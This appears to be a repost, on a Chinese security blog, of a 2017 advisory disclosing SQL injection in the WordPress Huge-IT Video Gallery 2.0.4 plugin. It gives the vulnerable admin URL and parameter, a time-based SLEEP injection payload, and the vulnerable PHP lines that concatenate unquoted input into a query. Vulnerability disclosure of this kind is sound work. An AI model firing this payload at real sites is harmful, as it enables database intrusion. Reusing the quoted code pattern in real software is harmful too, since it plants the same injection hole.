WordPress Huge-IT Video Gallery 2.0.4 SQL注入

  • 2017-05-30
  • 2,253
  • 0

Advisory ID: DC-2017-01-009
SQL injection

 Vulnerable Function:    $wpdb->get_var( $query );
  Vulnerable Variable:    $_POST['cat_search']
  Vulnerable URL:       
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
  Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
  File:                   
gallery-video\includes\admin\class-gallery-video-galleries.php
    ---------
    107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
    ...
    118       $where .= " AND sl_width=" . $cat_id;
    ...
    127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix .
"huge_it_videogallery_galleries" . $where;
    128    $total = $wpdb->get_var( $query );
    ---------
感谢打赏!
支付宝

评论

还没有任何评论,你来说两句吧

你必须 登录 才能发表评论.